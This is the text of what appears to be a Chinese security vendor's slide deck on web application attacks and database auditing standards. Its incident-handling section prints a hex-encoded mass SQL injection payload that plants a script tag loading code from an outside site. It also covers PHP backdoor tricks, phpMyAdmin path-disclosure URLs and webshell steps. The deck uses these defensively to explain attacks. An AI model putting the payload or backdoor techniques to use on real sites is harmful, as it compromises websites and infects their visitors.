数据库安全审计ppt课件

WebApplicationSecurityandDatabaseAuditMiscs,DBAPPSecurityInc杭州安恒信息技术有限公司FrankdbappSFrank.Fan,主讲人,本期要点：,Web应用安全挑战和分析数据库审计安全风险+管理风险-审计,主要内容,公司简介数据库安全审计概念各类规范要求和数据库审计系统需求分析明御数据库审计与风险控制系统案例分析小结,2008北京奥组委安全产品和服务提供商,作为2008北京奥组委安全产品和服务提供商，2008年9月安恒信息被2008北京奥运会组委会授予08奥运安全保障杰出贡献奖。,ManyIncidentHandlingSupport,黑客产业链,收费传播流氓软件,拒绝服务攻击,发送垃圾邮件,主动攻击勒索网站,受雇攻击收取佣金,总共检测网站近700家90%网站存在严重安全隐患部分网站已经被挂马或被黑客控制,Agenda,MassInjectionAttackToolRevealedPHPBackdoorTipsSomehackingtipsaboutphpmydamin,MassInjectionToolRevealed,HowdidWefindit?FromaBotMachineduringIncidentHandling,Realcaseinincidenthandling!,2008-05-1300:28:25W3SVC6282499371POST/news_default.asptid=117;DECLARE%20S%20NVARCHAR(4000);SET%20S=CAST(0 x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006B0069006C006C0077006F00770031002E0063006E002F0067002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000);EXEC(S);-80-23Mozilla/3.0+(compatible;+Indy+Library)20000,Realcontent,DECLARETvarchar(255),Cvarchar(255)DECLARETable_CursorCURSORFOR,fromsysobjectsa,syscolumnsbwherea.id=b.idanda.xtype=uand(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)OPENTable_CursorFETCHNEXTFROMTable_CursorINTOT,CWHILE(FETCH_STATUS=0)BEGINexec(update+T+set+C+=rtrim(convert(varchar,+C+)+)FETCHNEXTFROMTable_CursorINTOT,CENDCLOSETable_CursorDEALLOCATETable_Cursor,Keypart:,MassInjectionToolRevealed,MassInjectionToolRevealed,MassInjectionTool-Config.ini,initedkey=inurl:(.aspx?-(gov)自动产生ranklimit=1000000cipin=50timeout=20process=1retry=3thread=88bufferlength=10cpu=115sellang=0scanmode=0chkbox1=1chkbox2=0chkbox3=1chkbox4=0chkbox5=1chkbox6=0chkbufferlength=1chkranklimit=0IgnoreUrl=#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$A#$D#$AIgnoreKey=NotFound#$D#$A盗链#$D#$A文件不存在#$D#$A,PHPbackdoor,Basename()Include()Eval()Preg_replace(),Basename(),?,Include(),Modifyconfigurationfile,php.ini.htaccess,Updatephp.ini,Update.htaccess文件,.htaccess#php_valueauto_prepend_file.htaccess,Somehackingtipsaboutphpmydamin,1.Getphpmyadminsabsolutepath(Multiversionsupport)2.InferenceVariableinfo(mysqlrelated)3、Package(defaultstuff)4、Errorinfoinference5、phpinfoEnable6、Injection7、Getwebshell,Getphpmyadminsabsolutepath,http:/xx/phpmyadmin/themes/darkblue_orange/layout.inc.phphttp:/xx/phpMyAdmin/index.php?lang=1http:/xx/phpmyadmin/libraries/select_lang.lib.phphttp:/xx/phpmyadmin/scripts/check_lang.phphttp:/xx/phpmyadmin/libraries/export/xls.php,三、Package,APMServC:APM_SetupServerphpMyAdminAppServC:AppServwwwphpMyAdminXAMPPC:xamppphpMyAdmin.,七、GetWebshell,Usedumpfiletogetwebshell,RealCaseusedsomecodehardening,RealCaseCookieInjection,DefenseTips,WebApplicationFirewallChallengeCodeandConfigurationhardeningChallenge,WebApplicationFirewall(WAF)历史,Web应用防火墙第一代：流方式Web应用防火墙第二代：,第二代Web应用防火墙,支持全透明直连部署HTTPS全透明支持Web加速功能抗各类Web攻击,第二部分：数据库审计概念审计信息安全审计数据库审计,审计,检查、验证目标的准确性和完整性，用以防止虚假数据和欺骗行为，以及是否符合既定的标准、标竿和其它审计原则萨班斯法案美国史上最严厉的审计法则企业内部控制规范国内审计规范，主要目的在于加强和规范企业内部控制，提高企业经营管理水平和风险行为防范能力财务审计、IT审计信息安全审计,信息安全审计,收集并评估证据以决定一个计算机系统是否有效做到保护资产、维护数据完整、完成目标，同时最经济的使用资源萨班斯法案强调加强与财务报表相关的IT系统内部控制，其中，IT系统内部控制是紧密围绕信息安全审计这一核心的。巴赛尔新资本协定(BaselII)，要求全球银行必须做好风险控管(riskmanagement)，而这项“金融作业风险”的防范正需要业务信息安全审计为依托。企业内部控制具体规范明确要求计算机信息系统应采取权责分配及职责分工、建立访问安全策略等审计措施以加强提高信息系统的可靠性、稳定性、安全性及数据的完整性和准确性。ISO17799、CC、PCI,数据库安全审计,确保数据的完整性数据库安全审计，通过对数据库安全性相关的操作进行审计，监测指定用户的行为，掌握数据库使用状况。数据库审计是信息安全审计的重要组成部分。数据库审计的目的在于确保数据的完整性全面了解数据库实际发生的情况可疑行为发生时可以自动启动预先设置的告警流程，防范数据库风险的发生,第三部分：数据库审计系统需求分析安全需求分析数据库安全攻击事件正在升级数据库安全分析现有安全解决方案无法有效应对数据库攻击行为相关法律法规数据库审计系统应满足的要求,数据库安全攻击事件某系统开发工程师通过互联网入侵移动中心数据库，盗取冲值卡某医院数据库系统遭到非法入侵，导致上万名患者私隐信息被盗取某网游公司内部数据库管理人员通过违规修改数据库数据盗窃网游点卡黑客利用SQL注入攻击，入侵某防病毒软件数据库中心，窃取大量机密信息，导致该防病毒软件公司严重损失某证券交易所内部数据库造黑客股民入侵，盗窃证券交易内部报告针对数据库进行的安全攻击事件正在升级！,数据库审计系统需求分析安全需求分析,数据库安全分析,数据库面临的风险,内部人员误操作、违规操作、越权操作第三方维护人员安全隐患最高权限用户操作多人共用一个帐号员工离职后泄漏公司信息,复杂的业务应用+异构的网络环境+高度集中的信息共享使企业核心数据库面临更大的安全挑战,现有的安全解决方案,现有的安全解决方案不能有效应对,防火墙只能检测网络层的攻击无法阻拦来自网络内部的非法操作无法动态识别或自适应地调整规则对WEB应用,端口80或443必须开放,IDS/IPS只检测已知特征对数据层的信息缺乏深度分析，误报/漏报率很高没有对session/user的跟踪；不能保护SSL流量针对网络层,由于数据库本身的重要性以及脆弱性，国家以及国际上都制定了相关的法律法规来指导并规范数据库信息系统的安全建设其中最重要的是明确了独立数据库审计系统的必要性和重要性,数据库审计系统需求分析相关法律法规,信息安全等级保护测评准则信息安全等级保护测评准则第六章“第二级安全控制测评”中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到服务器上的每个操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等审计记录应受到保护避免受到未预期的删除、修改或覆盖等,信息安全等级保护测评准则第七章“第三级安全控制测评”中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到应用系统的每个操作系统用户和数据库用户安全审计应记录应用系统重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统功能的执行等安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等,信息安全等级保护测评准则第七章“第四级安全控制测评”中第一节“安全技术测评”主机系统安全审计中明确提出：安全审计应覆盖到服务器和客户端上的所有操作系统用户和数据库用户安全审计应记录系统内重要的安全相关事件，包括重要用户行为、系统资源的异常使用和重要系统命令的使用安全相关事件的记录应包括日期和时间、类型、主体标识、客体标识、客体敏感标记、事件的结果等安全审计应可以根据记录数据进行分析，并生成审计报表安全审计应可以对特定事件，提供指定方式的实时报警审计进程应受到保护避免受到未预期的中断审计记录应受到保护避免受到未预期的删除、修改或覆盖等安全审计应能跟踪监测到可能的安全侵害事件，并终止违规进程安全审计应根据信息系统的统一安全策略，实现集中审计系统设备时钟应与时钟服务器时钟保持同步,等级保护数据库管理技术要求计算机信息系统安全等级保护数据库管理技术要求第四章“数据库管理系统安全技术要求”中第四节“数据库安全审计”中明确提出数据库管理系统的安全审计应：建立独立的安全审计系统定义与数据库安全相关的审计事件设置专门的安全审计员设置专门用于存储数据库系统审计数据的安全审计库提供适用于数据库系统的安全审计设置、分析和查阅的工具,ISO体系,BS7799/ISO27001BS7799-1（ISO）1999信息技术信息安全管理业务规范第十章“系统开发与维护”中第二节“应用系统中的安全”明确提出：为“防止应用系统中用户数据的丢失、修改或滥用”，“应用系统应设计包含适当的控制措施和审计追踪或活动日志记录，包括在用户写入的应用程序中。这些系统应包括对输入数据、内部处理和输出数据的检验功能。”BS7799-22002信息技术信息安全管理系统规范第四章“详细监控”中第七节“访问控制”第7小节“监控对系统的访问和使用”明确提出：为实现“探测未经授权的行为”的目标，“应提供对异常事件和与安全相关事件的审计日志”。,ISO15408ISO15408-2安全功能要求明确要求数据库安全审计应包括：识别、记录、存储和分析那些与安全相关活动（即由TSP控制的活动）有关的信息。检查审计记录结果可用来判断发生了哪些安全相关活动以及哪个用户要对这些活动负责。,支付卡行业数据安全标准（PCI）PCI验证访问任何数据库（其中包括持卡人数据）的所有操作。这包括应用程序、管理员和所有其他用户的访问操作。8.5.16.a检查数据库和应用程序配置设置，以确定用户身份认证和数据库的访问包括以下内容：所有用户在访问前必须进行身份认证所有的用户访问数据库、查询数据库和操作数据库（例如移动、复制、删除）行为必须只能通过编程方法（例如，通过存储的程序）只有数据库管理员才能直接访问数据库或查询数据库。8.5.16.b检查数据库应用程序和相关应用程序ID，以确定应用程序ID仅限应用程序（而不是个人用户或其他流程）使用。,期货公司信息技术管理指引期货公司信息技术管理指引第二章“一级信息技术管理指引”第四节“信息安全”中明确指出“安全审计”应满足：核心业务系统的主要业务操作应产生审计记录，包括时间、发起者、类型、描述和结果等信息。应采取有效措施防止删除、修改或覆盖审计记录第三章“二级信息技术管理指引”、第四章“三级信息技术管理指引”以及“四级信息技术管理指引”中都有相应的内容明确“安全审计”的相关内容,综述,综上所述：一个完善数据库审计系统是数据库信息系统的安全建设必不可缺的同时，一个完善的数据库审计系统应满足以下要求：,数据库审计系统应满足的具体要求,第四部分：数据库审计的挑战以及明御数据库审计与风险控制系统数据库审计的挑战案例分析,挑战之一：数据库自身审计的矛盾和缺陷,概述性能影响巨大没有独立性和可信性没有存储能力信息缺失,挑战之二：海量数据VS细粒度,产品概述海量数据细粒度定位和策略控制的需求,挑战之三：完整审计的挑战,概述返回信息更重要，但是更难把握各种方式访问,挑战